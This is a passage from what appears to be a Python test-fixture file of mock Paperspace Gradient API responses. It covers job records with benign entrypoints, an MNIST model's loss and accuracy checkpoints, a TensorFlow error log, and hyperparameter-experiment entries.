"2019-03-25T15:19:08.337Z", "dtTeardownStarted": "2019-03-25T15:19:08.374Z", "dtTeardownFinished": "2019-03-25T15:19:08.461Z", "dtDeleted": None, "exitCode": 0, "queuePosition": None, "seqNum": 5, "storageRegion": "GCP West", "clusterMachine": "gradient-host-1553526309", "fqdn": "jzzinybinuxf9.dgradient.paperspace.com", "ports": "5000", "isPublic": False, "containerUser": None, "hasCode": None, "codeUploaded": None, "codeCommit": None, "runTillCancelled": None, "pushOnCompletion": None, "newImageName": None, "cpuHostname": "gradient-host-1553526309", "cpuCount": 4, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat arch_capabilities", "cpuMem": "24683148 kB", "gpuName": "Tesla P100-PCIE-16GB", "gpuSerial": "0324317067114", "gpuDevice": "/dev/nvidia0", "gpuDriver": "410.48", "gpuCount": 1, "gpuMem": "16280 MiB", "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "targetNodeAttrs": None, "jobEnv": None, "sharedMemMBytes": None, "shutdownTimeout": None, "isPreemptible": False, "metricsURL": "metrics-gcp-dev.paperspace.io", "customMetrics": None, "experimentId": "ep6hmawh97q0v" }, { "id": "jsb37duc1zlbz0", "name": "keton4-worker-1", "state": "Stopped", "workspaceUrl": "git+https://github.com/Paperspace/multinode-mnist", "workingDirectory": "/paperspace", "artifactsDirectory": "/artifacts", "entrypoint": "echo siema", "projectId": "prmr22ve0", "project": "keton", "container": "Test-Container", "containerUrl": "paperspace/tensorflow:1.5.0-gpu", "baseContainer": "Test-Container", "baseContainerUrl": "paperspace/tensorflow:1.5.0-gpu", "machineType": "P100", "cluster": "PS Jobs on GCP", "clusterId": "clkyczmyz", "usageRate": "P100 hourly", "startedByUserId": "ukgvw4i8", "parentJobId": None, "jobError": None, "dtCreated": "2019-03-25T15:29:04.601Z", "dtModified": "2019-03-25T15:29:04.601Z", "dtProvisioningStarted": "2019-03-25T15:30:42.529Z", "dtProvisioningFinished": "2019-03-25T15:30:48.252Z", "dtStarted": "2019-03-25T15:30:48.252Z", "dtFinished": "2019-03-25T15:30:53.349Z", "dtTeardownStarted": "2019-03-25T15:30:53.387Z", "dtTeardownFinished": "2019-03-25T15:30:53.470Z", "dtDeleted": None, "exitCode": 0, "queuePosition": None, "seqNum": 6, "storageRegion": "GCP West", "clusterMachine": "gradient-host-1553526309", "fqdn": "jsb37duc1zlbz0.dgradient.paperspace.com", "ports": "3456", "isPublic": False, "containerUser": None, "hasCode": None, "codeUploaded": None, "codeCommit": None, "runTillCancelled": None, "pushOnCompletion": None, "newImageName": None, "cpuHostname": "gradient-host-1553526309", "cpuCount": 4, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat arch_capabilities", "cpuMem": "24683148 kB", "gpuName": "Tesla P100-PCIE-16GB", "gpuSerial": "0324317067114", "gpuDevice": "/dev/nvidia0", "gpuDriver": "410.48", "gpuCount": 1, "gpuMem": "16280 MiB", "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "targetNodeAttrs": None, "jobEnv": None, "sharedMemMBytes": None, "shutdownTimeout": None, "isPreemptible": False, "metricsURL": "metrics-gcp-dev.paperspace.io", "customMetrics": None, "experimentId": "esgeuvkdokyom2" }, { "id": "jq41vipwy18f7", "name": "keton4-parameter_server-1", "state": "Stopped", "workspaceUrl": "git+https://github.com/Paperspace/multinode-mnist", "workingDirectory": "/paperspace", "artifactsDirectory": "/artifacts", "entrypoint": "ls", "projectId": "prmr22ve0", "project": "keton", "container": "Test-Container", "containerUrl": "paperspace/tensorflow:1.5.0-gpu", "baseContainer": "Test-Container", "baseContainerUrl": "paperspace/tensorflow:1.5.0-gpu", "machineType": "P100", "cluster": "PS Jobs on GCP", "clusterId": "clkyczmyz", "usageRate": "P100 hourly", "startedByUserId": "ukgvw4i8", "parentJobId": None, "jobError": None, "dtCreated": "2019-03-25T15:29:06.765Z", "dtModified": "2019-03-25T15:29:06.765Z", "dtProvisioningStarted": "2019-03-25T15:30:41.416Z", "dtProvisioningFinished": "2019-03-25T15:30:48.004Z", "dtStarted": "2019-03-25T15:30:48.004Z", "dtFinished": "2019-03-25T15:30:53.097Z", "dtTeardownStarted": "2019-03-25T15:30:53.135Z", "dtTeardownFinished": "2019-03-25T15:30:53.223Z", "dtDeleted": None, "exitCode": 0, "queuePosition": None, "seqNum": 7, "storageRegion": "GCP West", "clusterMachine": "gradient-host-1553526384", "fqdn": "jq41vipwy18f7.dgradient.paperspace.com", "ports": "3456", "isPublic": False, "containerUser": None, "hasCode": None, "codeUploaded": None, "codeCommit": None, "runTillCancelled": None, "pushOnCompletion": None, "newImageName": None, "cpuHostname": "gradient-host-1553526384", "cpuCount": 4, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat arch_capabilities", "cpuMem": "24683148 kB", "gpuName": "Tesla P100-PCIE-16GB", "gpuSerial": "0324317004340", "gpuDevice": "/dev/nvidia0", "gpuDriver": "410.48", "gpuCount": 1, "gpuMem": "16280 MiB", "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "targetNodeAttrs": None, "jobEnv": None, "sharedMemMBytes": None, "shutdownTimeout": None, "isPreemptible": False, "metricsURL": "metrics-gcp-dev.paperspace.io", "customMetrics": None, "experimentId": "esgeuvkdokyom2" }, { "id": "jsigkjnyb6m3qm", "name": "Test1-worker-1", "state": "Stopped", "workspaceUrl": "git+https://github.com/Paperspace/mnist-sample", "workingDirectory": "/paperspace", "artifactsDirectory": "/artifacts", "entrypoint": "python mnist.py --data_format=channels_last", "projectId": "prmr22ve0", "project": "keton", "container": "tensorflow/tensorflow:1.13.1-py3", "containerUrl": "tensorflow/tensorflow:1.13.1-py3", "baseContainer": "tensorflow/tensorflow:1.13.1-py3", "baseContainerUrl": "tensorflow/tensorflow:1.13.1-py3", "machineType": "K80", "cluster": "PS Jobs on GCP", "clusterId": "clkyczmyz", "usageRate": "K80 hourly", "startedByUserId": "ukgvw4i8", "parentJobId": None, "jobError": None, "dtCreated": "2019-04-02T15:17:05.618Z", "dtModified": "2019-04-02T15:17:05.618Z", "dtProvisioningStarted": "2019-04-02T15:17:11.018Z", "dtProvisioningFinished": "2019-04-02T15:17:56.754Z", "dtStarted": "2019-04-02T15:17:56.754Z", "dtFinished": "2019-04-02T17:02:26.950Z", "dtTeardownStarted": "2019-04-02T17:02:26.987Z", "dtTeardownFinished": "2019-04-02T17:02:54.596Z", "dtDeleted": None, "exitCode": 0, "queuePosition": None, "seqNum": 8, "storageRegion": "GCP West", "clusterMachine": "gradient-host-1553793082-82415ed3", "fqdn": "jsigkjnyb6m3qm.dgradient.paperspace.com", "ports": "5000:5000", "isPublic": False, "containerUser": None, "hasCode": None, "codeUploaded": None, "codeCommit": None, "runTillCancelled": None, "pushOnCompletion": None, "newImageName": None, "cpuHostname": "gradient-host-1553793082-82415ed3", "cpuCount": 2, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat arch_capabilities", "cpuMem": "12297216 kB", "gpuName": "Tesla K80", "gpuSerial": "0320617087317", "gpuDevice": "/dev/nvidia0", "gpuDriver": "410.48", "gpuCount": 1, "gpuMem": "11441 MiB", "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "targetNodeAttrs": None, "jobEnv": None, "sharedMemMBytes": None, "shutdownTimeout": None, "isPreemptible": False, "metricsURL": "metrics-gcp-dev.paperspace.io", "customMetrics": None, "experimentId": "ehla1kvbwzaco" }, { "id": "j4g76vuppxqao", "name": "job 1", "state": "Stopped", "workspaceUrl": "s3://ps-projects-development/przhbct98/j4g76vuppxqao/__init__.py.zip", "workingDirectory": "/paperspace", "artifactsDirectory": "/artifacts", "entrypoint": "echo keton", "projectId": "przhbct98", "project": "paperspace-python", "container": "paperspace/tensorflow-python", "containerUrl": "paperspace/tensorflow-python", "baseContainer": "paperspace/tensorflow-python", "baseContainerUrl": "paperspace/tensorflow-python", "machineType": "K80", "cluster": "PS Jobs on GCP", "clusterId": "clkyczmyz", "usageRate": "K80 hourly", "startedByUserId": "ukgvw4i8", "parentJobId": None, "jobError": None, "dtCreated": "2019-04-04T15:12:34.414Z", "dtModified": "2019-04-04T15:12:34.414Z", "dtProvisioningStarted": "2019-04-04T15:12:41.338Z", "dtProvisioningFinished": "2019-04-04T15:12:47.492Z", "dtStarted": "2019-04-04T15:12:47.492Z", "dtFinished": "2019-04-04T15:12:52.582Z", "dtTeardownStarted": "2019-04-04T15:12:52.621Z", "dtTeardownFinished": "2019-04-04T15:12:52.752Z", "dtDeleted": None, "exitCode": 0, "queuePosition": None, "seqNum": 1, "storageRegion": "GCP West", "clusterMachine": "gradient-host-1553793082-82415ed3", "fqdn": "j4g76vuppxqao.dgradient.paperspace.com", "ports": None, "isPublic": None, "containerUser": None, "hasCode": None, "codeUploaded": None, "codeCommit": None, "runTillCancelled": None, "pushOnCompletion": None, "newImageName": None, "cpuHostname": "gradient-host-1553793082-82415ed3", "cpuCount": 2, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat arch_capabilities", "cpuMem": "12297216 kB", "gpuName": "Tesla K80", "gpuSerial": "0320617087317", "gpuDevice": "/dev/nvidia0", "gpuDriver": "410.48", "gpuCount": 1, "gpuMem": "11441 MiB", "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "targetNodeAttrs": None, "jobEnv": None, "sharedMemMBytes": None, "shutdownTimeout": None, "isPreemptible": False, "metricsURL": "metrics-gcp-dev.paperspace.io", "customMetrics": None, "experimentId": "esfmkbql393ut0" }, { "id": "jsbnvdhwb46vr9", "name": "job 2", "state": "Failed", "workspaceUrl": "s3://ps-projects-development/przhbct98/jsbnvdhwb46vr9/temp.zip", "workingDirectory": "/paperspace", "artifactsDirectory": "/artifacts", "entrypoint": ". test.sh\npython2 hello.py", "projectId": "przhbct98", "project": "paperspace-python", "container": "paperspace/tensorflow-python", "containerUrl": "paperspace/tensorflow-python", "baseContainer": "paperspace/tensorflow-python", "baseContainerUrl": "paperspace/tensorflow-python", "machineType": "G1", "cluster": "PS Jobs on GCP", "clusterId": "clkyczmyz", "usageRate": "G1 hourly", "startedByUserId": "ukgvw4i8", "parentJobId": None, "jobError": None, "dtCreated": "2019-04-24T09:09:53.645Z", "dtModified": "2019-04-24T09:09:53.645Z", "dtProvisioningStarted": "2019-04-24T09:10:50.771Z", "dtProvisioningFinished": "2019-04-24T09:11:50.968Z", "dtStarted": "2019-04-24T09:11:50.968Z", "dtFinished": "2019-04-24T09:11:56.092Z", "dtTeardownStarted": "2019-04-24T09:11:56.150Z", "dtTeardownFinished": "2019-04-24T09:11:56.346Z", "dtDeleted": None, "exitCode": 2, "queuePosition": None, "seqNum": 2, "storageRegion": "GCP West", "clusterMachine": "gradient-host-1556074006", "fqdn": "jsbnvdhwb46vr9.dgradient.paperspace.com", "ports": None, "isPublic": None, "containerUser": None, "hasCode": None, "codeUploaded": None, "codeCommit": None, "runTillCancelled": None, "pushOnCompletion": None, "newImageName": None, "cpuHostname": "gradient-host-1556074006", "cpuCount": 1, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat arch_capabilities", "cpuMem": "1783384 kB", "gpuName": None, "gpuSerial": None, "gpuDevice": None, "gpuDriver": None, "gpuCount": None, "gpuMem": None, "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "targetNodeAttrs": None, "jobEnv": None, "sharedMemMBytes": None, "shutdownTimeout": None, "isPreemptible": False, "metricsURL": "metrics-gcp-dev.paperspace.io", "customMetrics": None, "experimentId": "esmnlol3tavvvf" }, { "id": "jt8alwzv28kha", "name": "job 3", "state": "Failed", "workspaceUrl": "s3://ps-projects-development/przhbct98/jt8alwzv28kha/temp.zip", "workingDirectory": "/paperspace", "artifactsDirectory": "/artifacts", "entrypoint": ". test.sh\npython2 hello.py", "projectId": "przhbct98", "project": "paperspace-python", "container": "paperspace/tensorflow-python", "containerUrl": "paperspace/tensorflow-python", "baseContainer": "paperspace/tensorflow-python", "baseContainerUrl": "paperspace/tensorflow-python", "machineType": "G1", "cluster": "PS Jobs on GCP", "clusterId": "clkyczmyz", "usageRate": "G1 hourly", "startedByUserId": "ukgvw4i8", "parentJobId": None, "jobError": None, "dtCreated": "2019-04-24T10:18:30.620Z", "dtModified": "2019-04-24T10:18:30.620Z", "dtProvisioningStarted": "2019-04-24T10:18:35.057Z", "dtProvisioningFinished": "2019-04-24T10:18:38.241Z", "dtStarted": "2019-04-24T10:18:38.241Z", "dtFinished": "2019-04-24T10:18:43.348Z", "dtTeardownStarted": "2019-04-24T10:18:43.394Z", "dtTeardownFinished": "2019-04-24T10:18:43.544Z", "dtDeleted": None, "exitCode": 2, "queuePosition": None, "seqNum": 3, "storageRegion": "GCP West", "clusterMachine": "gradient-host-1556074006", "fqdn": "jt8alwzv28kha.dgradient.paperspace.com", "ports": None, "isPublic": None, "containerUser": None, "hasCode": None, "codeUploaded": None, "codeCommit": None, "runTillCancelled": None, "pushOnCompletion": None, "newImageName": None, "cpuHostname": "gradient-host-1556074006", "cpuCount": 1, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat arch_capabilities", "cpuMem": "1783384 kB", "gpuName": None, "gpuSerial": None, "gpuDevice": None, "gpuDriver": None, "gpuCount": None, "gpuMem": None, "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "targetNodeAttrs": None, "jobEnv": None, "sharedMemMBytes": None, "shutdownTimeout": None, "isPreemptible": False, "metricsURL": "metrics-gcp-dev.paperspace.io", "customMetrics": None, "experimentId": "es47og38wzhnuo" } ] } LIST_MODELS_RESPONSE_JSON = { "modelList": [ { "id": "mosu30xm7q8vb0p", "projectId": "prmr22ve0", "experimentId": "ehla1kvbwzaco", "modelType": "Tensorflow", "name": None, "tag": None, "summary": { "loss": { "result": { "max": 0.028335485607385635, "min": 0.028335485607385635, "var": 0, "mean": 0.028335485607385635, "median": 0.028335485607385635, "stddev": 0 }, "scalar": "loss" }, "accuracy": { "result": { "max": 0.991100013256073, "min": 0.991100013256073, "var": 0, "mean": 0.991100013256073, "median": 0.991100013256073, "stddev": 0 }, "scalar": "accuracy" } }, "detail": [ { "scalars": [ { "data": [ { "operation": "mean", "checkpoints": [ { "value": 0.0621405728161335, "checkpoint": 1175 }, { "value": 0.039062466472387314, "checkpoint": 2323 }, { "value": 0.03250512480735779, "checkpoint": 3471 }, { "value": 0.025037841871380806, "checkpoint": 4606 }, { "value": 0.02336057461798191, "checkpoint": 5785 }, { "value": 0.024296583607792854, "checkpoint": 6956 }, { "value": 0.021974526345729828, "checkpoint": 8116 }, { "value": 0.021116264164447784, "checkpoint": 9262 }, { "value": 0.020851025357842445, "checkpoint": 10397 }, { "value": 0.022611157968640327, "checkpoint": 11566 }, { "value": 0.028335485607385635, "checkpoint": 12000 } ] }, { "operation": "amin", "checkpoints": [ { "value": 0.0621405728161335, "checkpoint": 1175 }, { "value": 0.039062466472387314, "checkpoint": 2323 }, { "value": 0.03250512480735779, "checkpoint": 3471 }, { "value": 0.025037841871380806, "checkpoint": 4606 }, { "value": 0.02336057461798191, "checkpoint": 5785 }, { "value": 0.024296583607792854, "checkpoint": 6956 }, { "value": 0.021974526345729828, "checkpoint": 8116 }, { "value": 0.021116264164447784, "checkpoint": 9262 }, { "value": 0.020851025357842445, "checkpoint": 10397 }, { "value": 0.022611157968640327, "checkpoint": 11566 }, { "value": 0.028335485607385635, "checkpoint": 12000 } ] }, { "operation": "amax", "checkpoints": [ { "value": 0.0621405728161335, "checkpoint": 1175 }, { "value": 0.039062466472387314, "checkpoint": 2323 }, { "value": 0.03250512480735779, "checkpoint": 3471 }, { "value": 0.025037841871380806, "checkpoint": 4606 }, { "value": 0.02336057461798191, "checkpoint": 5785 }, { "value": 0.024296583607792854, "checkpoint": 6956 }, { "value": 0.021974526345729828, "checkpoint": 8116 }, { "value": 0.021116264164447784, "checkpoint": 9262 }, { "value": 0.020851025357842445, "checkpoint": 10397 }, { "value": 0.022611157968640327, "checkpoint": 11566 }, { "value": 0.028335485607385635, "checkpoint": 12000 } ] }, { "operation": "median", "checkpoints": [ { "value": 0.0621405728161335, "checkpoint": 1175 }, { "value": 0.039062466472387314, "checkpoint": 2323 }, { "value": 0.03250512480735779, "checkpoint": 3471 }, { "value": 0.025037841871380806, "checkpoint": 4606 }, { "value": 0.02336057461798191, "checkpoint": 5785 }, { "value": 0.024296583607792854, "checkpoint": 6956 }, { "value": 0.021974526345729828, "checkpoint": 8116 }, { "value": 0.021116264164447784, "checkpoint": 9262 }, { "value": 0.020851025357842445, "checkpoint": 10397 }, { "value": 0.022611157968640327, "checkpoint": 11566 }, { "value": 0.028335485607385635, "checkpoint": 12000 } ] }, { "operation": "std", "checkpoints": [ { "value": 0, "checkpoint": 1175 }, { "value": 0, "checkpoint": 2323 }, { "value": 0, "checkpoint": 3471 }, { "value": 0, "checkpoint": 4606 }, { "value": 0, "checkpoint": 5785 }, { "value": 0, "checkpoint": 6956 }, { "value": 0, "checkpoint": 8116 }, { "value": 0, "checkpoint": 9262 }, { "value": 0, "checkpoint": 10397 }, { "value": 0, "checkpoint": 11566 }, { "value": 0, "checkpoint": 12000 } ] }, { "operation": "var", "checkpoints": [ { "value": 0, "checkpoint": 1175 }, { "value": 0, "checkpoint": 2323 }, { "value": 0, "checkpoint": 3471 }, { "value": 0, "checkpoint": 4606 }, { "value": 0, "checkpoint": 5785 }, { "value": 0, "checkpoint": 6956 }, { "value": 0, "checkpoint": 8116 }, { "value": 0, "checkpoint": 9262 }, { "value": 0, "checkpoint": 10397 }, { "value": 0, "checkpoint": 11566 }, { "value": 0, "checkpoint": 12000 } ] } ], "scalar": "loss" }, { "data": [ { "operation": "mean", "checkpoints": [ { "value": 0.9804999828338623, "checkpoint": 1175 }, { "value": 0.9872000217437744, "checkpoint": 2323 }, { "value": 0.9904000163078308, "checkpoint": 3471 }, { "value": 0.9912999868392944, "checkpoint": 4606 }, { "value": 0.9919999837875366, "checkpoint": 5785 }, { "value": 0.991599977016449, "checkpoint": 6956 }, { "value": 0.992900013923645, "checkpoint": 8116 }, { "value": 0.9922000169754028, "checkpoint": 9262 }, { "value": 0.9930999875068665, "checkpoint": 10397 }, { "value": 0.9926000237464905, "checkpoint": 11566 }, { "value": 0.991100013256073, "checkpoint": 12000 } ] }, { "operation": "amin", "checkpoints": [ { "value": 0.9804999828338623, "checkpoint": 1175 }, { "value": 0.9872000217437744, "checkpoint": 2323 }, { "value": 0.9904000163078308, "checkpoint": 3471 }, { "value": 0.9912999868392944, "checkpoint": 4606 }, { "value": 0.9919999837875366, "checkpoint": 5785 }, { "value": 0.991599977016449, "checkpoint": 6956 }, { "value": 0.992900013923645, "checkpoint": 8116 }, { "value": 0.9922000169754028, "checkpoint": 9262 }, { "value": 0.9930999875068665, "checkpoint": 10397 }, { "value": 0.9926000237464905, "checkpoint": 11566 }, { "value": 0.991100013256073, "checkpoint": 12000 } ] }, { "operation": "amax", "checkpoints": [ { "value": 0.9804999828338623, "checkpoint": 1175 }, { "value": 0.9872000217437744, "checkpoint": 2323 }, { "value": 0.9904000163078308, "checkpoint": 3471 }, { "value": 0.9912999868392944, "checkpoint": 4606 }, { "value": 0.9919999837875366, "checkpoint": 5785 }, { "value": 0.991599977016449, "checkpoint": 6956 }, { "value": 0.992900013923645, "checkpoint": 8116 }, { "value": 0.9922000169754028, "checkpoint": 9262 }, { "value": 0.9930999875068665, "checkpoint": 10397 }, { "value": 0.9926000237464905, "checkpoint": 11566 }, { "value": 0.991100013256073, "checkpoint": 12000 } ] }, { "operation": "median", "checkpoints": [ { "value": 0.9804999828338623, "checkpoint": 1175 }, { "value": 0.9872000217437744, "checkpoint": 2323 }, { "value": 0.9904000163078308, "checkpoint": 3471 }, { "value": 0.9912999868392944, "checkpoint": 4606 }, { "value": 0.9919999837875366, "checkpoint": 5785 }, { "value": 0.991599977016449, "checkpoint": 6956 }, { "value": 0.992900013923645, "checkpoint": 8116 }, { "value": 0.9922000169754028, "checkpoint": 9262 }, { "value": 0.9930999875068665, "checkpoint": 10397 }, { "value": 0.9926000237464905, "checkpoint": 11566 }, { "value": 0.991100013256073, "checkpoint": 12000 } ] }, { "operation": "std", "checkpoints": [ { "value": 0, "checkpoint": 1175 }, { "value": 0, "checkpoint": 2323 }, { "value": 0, "checkpoint": 3471 }, { "value": 0, "checkpoint": 4606 }, { "value": 0, "checkpoint": 5785 }, { "value": 0, "checkpoint": 6956 }, { "value": 0, "checkpoint": 8116 }, { "value": 0, "checkpoint": 9262 }, { "value": 0, "checkpoint": 10397 }, { "value": 0, "checkpoint": 11566 }, { "value": 0, "checkpoint": 12000 } ] }, { "operation": "var", "checkpoints": [ { "value": 0, "checkpoint": 1175 }, { "value": 0, "checkpoint": 2323 }, { "value": 0, "checkpoint": 3471 }, { "value": 0, "checkpoint": 4606 }, { "value": 0, "checkpoint": 5785 }, { "value": 0, "checkpoint": 6956 }, { "value": 0, "checkpoint": 8116 }, { "value": 0, "checkpoint": 9262 }, { "value": 0, "checkpoint": 10397 }, { "value": 0, "checkpoint": 11566 }, { "value": 0, "checkpoint": 12000 } ] } ], "scalar": "accuracy" } ], "session": "eval" } ], "params": None, "url": "s3://ps-projects-development/prmr22ve0/ehla1kvbwzaco/model/", "notes": None, "isDeleted": False, "isPublic": False, "dtCreated": "2019-04-02T17:02:47.157Z", "dtModified": "2019-04-02T17:02:54.273Z", "dtUploaded": "2019-04-02T17:02:54.273Z", "dtDeleted": None, "modelPath": "/artifacts" } ], "total": 1, "displayTotal": 1 } LIST_OF_LOGS_FOR_JOB = [ { "line": 1, "timestamp": "2019-04-03T15:56:35.457Z", "message": "Traceback (most recent call last):" }, { "line": 2, "timestamp": "2019-04-03T15:56:35.458Z", "message": " File \"generate_figures.py\", line 15, in <module>" }, { "line": 3, "timestamp": "2019-04-03T15:56:35.458Z", "message": " import dnnlib.tflib as tflib" }, { "line": 4, "timestamp": "2019-04-03T15:56:35.458Z", "message": " File \"/paperspace/dnnlib/tflib/__init__.py\", line 8, in <module>" }, { "line": 5, "timestamp": "2019-04-03T15:56:35.458Z", "message": " from . import autosummary" }, { "line": 6, "timestamp": "2019-04-03T15:56:35.458Z", "message": " File \"/paperspace/dnnlib/tflib/autosummary.py\", line 31, in <module>" }, { "line": 7, "timestamp": "2019-04-03T15:56:35.458Z", "message": " from . import tfutil" }, { "line": 8, "timestamp": "2019-04-03T15:56:35.458Z", "message": " File \"/paperspace/dnnlib/tflib/tfutil.py\", line 34, in <module>" }, { "line": 9, "timestamp": "2019-04-03T15:56:35.458Z", "message": " def shape_to_list(shape: Iterable[tf.Dimension]) -> List[Union[int, None]]:" }, { "line": 10, "timestamp": "2019-04-03T15:56:35.458Z", "message": "AttributeError: module \'tensorflow\' has no attribute \'Dimension\'" }, { "line": 11, "timestamp": "2019-04-03T15:56:46.168Z", "message": "PSEOF" } ] LIST_HYPERPARAMETERS_RESPONSE_JSON = { "data": [ { "dtCreated": "2019-05-13T11:29:43.155736+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2019-05-13T11:29:43.155736+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": None, "experimentTemplateHistoryId": 45987, "experimentTemplateId": 8, "experimentTypeId": 4, "handle": "es3dn6fu16r4kk", "id": 45980, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 199654, "state": 1, "templateHistory": { "dtCreated": "2019-05-13T11:29:41.933178+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 45987, "params": { "is_preemptible": False, "name": "some_name", "ports": 5000, "project_handle": "pr4yxj956", "tuning_command": "some command", "worker_command": "some worker command", "worker_container": "some_container", "worker_count": 1, "worker_machine_type": "k80", "worker_use_dockerfile": False, "workspaceUrl": "none" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-05-13T11:29:40.196982+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2019-05-13T11:29:40.196982+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": None, "experimentTemplateHistoryId": 45986, "experimentTemplateId": 8, "experimentTypeId": 4, "handle": "eshlqek7wzvrxa", "id": 45979, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 199654, "state": 1, "templateHistory": { "dtCreated": "2019-05-13T11:29:38.882999+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 45986, "params": { "is_preemptible": False, "name": "some_name", "ports": 5000, "project_handle": "pr4yxj956", "tuning_command": "some command", "worker_command": "some worker command", "worker_container": "some_container", "worker_count": 1, "worker_machine_type": "k80", "worker_use_dockerfile": False, "workspaceUrl": "none" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-05-13T11:25:03.760490+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2019-05-13T11:25:03.760490+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": None, "experimentTemplateHistoryId": 45985, "experimentTemplateId": 8, "experimentTypeId": 4, "handle": "esdwnui5qsk8qm", "id": 45978, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 199654, "state": 1, "templateHistory": { "dtCreated": "2019-05-13T11:25:02.489045+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 45985, "params": { "is_preemptible": False, "name": "some_name", "ports": 5000, "project_handle": "pr4yxj956", "tuning_command": "some command", "worker_command": "some worker command", "worker_container": "some_container", "worker_count": 1, "worker_machine_type": "k80", "worker_use_dockerfile": False, 